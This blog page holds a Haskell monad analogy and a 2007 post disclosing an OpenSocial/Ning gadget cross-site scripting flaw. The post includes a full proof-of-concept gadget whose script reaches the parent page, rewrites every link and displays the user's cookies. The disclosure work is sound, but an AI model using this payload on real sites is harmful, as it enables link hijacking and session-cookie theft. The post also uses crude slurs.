Shattering Inanity

Posted by harold at December 2nd, 2007

It seems like everybody and his brother (unless his brother makes web 2.0 sites with rounded corners) is clamoring to use Haskell these days. Mostly because they think it’s 31337, but have no idea how it actually works. This eventually devolves into a discussion of trying to figure out what the heck monads are. Well, I have another explanation, folks. And it involves an analogy.

Think about Schroedinger’s cat in the box. You can’t directly interact with the cat, but if you wanted to feed it, you could put a mouse in the box. And if you wanted to pet it, you couldn’t stick your hand in (’cause you’d be getting information out), but you could make a petting device and stick that in the box.

Well, folks, a monad M is basically a box. Something of type M a is a box with something of type a inside. For example, you could have an M cat where the type cat can have values LiveCat or DeadCat—but from outside the box, you don’t know which it is.

If you want to transform the a to a b, you have to make sure that all the information about the original a thing remain in the box. The only way to do this is to put a function of type a -> b into the box, with the instructions to apply it to the thing inside the box. For example, you might have an M cat and want to apply a function adorn that puts a little hat on the cat, which would have type cat -> (hat, cat). But hold on there! Now you need some help to put that function into the box.

The monad operations, explained elsewhere, are simply syntax for this intuition. The “return” function puts something into a box. The “bind” operation (>>= in Haskell) takes something in a box, and a function, and puts the function into the box and applies it to the thing inside. In Haskell, the function is actually expected to return something already in a box, so we’d have to compose return with our cat-hatting function (return . adorn), making something of type cat -> M (hat, cat). The rest is details.

Posted by harold at November 3rd, 2007

Friends. Romans. People with half a brain. It’s finally happened: Google’s opened the floodgates to ubiquitous bad taste, annoyances, and exploits across all social networking platforms, ranging from Ning to MySpace to the Iranian Goat Farmers’ Association. If you’ve been following the tech news lately, you’re probably aware that Google and his merry band of transvestites released the abomination known as the OpenSocial API this past Thursday. I understand that sounds like a pretty rash statement—I do get a rash some times—but this time I’m going to back it up with the facts and let you decide, doc.

It all started with a neat little trinket known as Google Gadgets. If you’re the sort of person who doesn’t give a damn about personal privacy, I’m sure you’ve used iGoogle, which allows you to put all kinds of nice little gadgets on your Google home page. Ok, even I use it—it’s just way too handy being able to check the weather and gas prices without even stepping outside! But you know, then I got hacking, and things didn’t look so hot anymore… any gadget that you add can run arbitrary javascript in your browser, and if you create a gadget using the “html-inline” content mode, it can even radically alter the structure of the iGoogle home page! So I tried that, and boy was I relieved when it gave me an extra little warning that I brashly clicked through to get my widget onto my home page… but hey, whatever I put on my iGoogle is my fault. It’s my customization.

On the other hand, social networks—at least amongst the non-retard/myspace set—very wisely have thus far constrained the format of peoples’ profiles. You get maybe a picture, some work history, and some stupid little details about how the person’s a big loser that nobody cares about. Maybe some trite comments from so-called “friends.” But with OpenSocial…? Perhaps you should take a look at my niece’s handiwork. Sorry, she’s not that stupid, I actually made that page myself (got you back, Berli!). Anyway, you see that little box o’ seizures titled “preaty culrz!”? It’s a Google Gadget in full glory.

But it gets worse than that, friends. That little Google Gadget could actually be a lot nastier than it looks, because it’s an “html-inline” component… when I add it on iGoogle, it makes my whole page background nauseatingly flashy. Ning is actually shielding your eyes by ignoring the fact that it’s an “html-inline” component—and forcing the box o’ seizures to be rendered in an iframe. But wait a minute. Where’s that iframe being loaded from?? Let’s take a gander at the source to Berlinetta’s page:

<iframe id="embeddingFrame" ...
src="/gadgets/index/gadgetWrapper?url=http%3A%2F%2Fhosting.gmodules.com%2Fig%2Fgadgets%2Ffile%2F107691354973556300155%2Fsplendid.xml&ownerName=18wefqtay110x&mode=profile">
</iframe>

Splendid! If you view the source of gadgetWrapper with the url argument, you’ll notice that the code of the Gadget is inserted into the gadgetWrapper page on the server side. Those Web 2.0 wizards just left the front gates unlocked and well-oiled, ready to be swung right open. Now what if, purely hypothetically, one of Berlinetta’s puckish little friends happened to oh, push the gate open and walk in? But we don’t have to wonder, we can know.

Yes dudes, that’s right: that innocent looking little gadget purportedly describing a delicious extract of mulberry actually extracts your delicious cookies and rewrites all of the hyperlinks on the page. I could have been more devious about it, but remember, my goal here is merely exposition of how much Web 2.0 sucks. In case you missed it, here’s the link to the page with the exploit, and here’s the exploitive little gadget itself:

<?xml version="1.0" encoding="UTF-8"?>
<Module>
<ModulePrefs title="Splendid!" />
<Content type="html"><![CDATA[
<script language="javascript">

function exploit() {
  var doc = window.top.document;
  var a = doc.getElementsByTagName('a');
  for (var i = 0; i < a.length; i++) {
    if (a[i].hasAttribute('href')) {
      a[i].setAttribute('href',
        'http://www.haroldtherebel.com/2007/11/03/peer-prescience/');
    }
  }
  document.getElementById('done').innerHTML
  = document.cookie;
}

</script>
<font color="#ffffff"><form>
<center>Click this button to make all of the links
        on this page go to haroldtherebel.com:<br/>
<input type="button" onclick="exploit();"
       value="Exploit now!"><br/>
cook-ease:<br/>
<textarea id="done" rows="10" cols="60"></textarea></center>
</form></font>
]]></Content>
</Module>

The exploit really stands for itself, but let me point out the magic line: “var doc = window.top.document;” This says “yeah, I know I’m a measly little iframe, but just forget that and give me access to the whole document.” If the iframe comes from the same server as the main page, your browser is more than happy to honor that request. Hence the gate swings open. The floodgates of antisocial behavior, opened courtesy of OpenSocial. Good job Ning, Google, and everybody else! Rah-rah Web 2.0! Cross-site scripting makes you strong and healthy like a beluga whale!

Yeah, I’m sure that stuff is worth billions. Sorry, I’d put my money on a factory full of slave laborors making tennis shoes in south-east Asia anyday.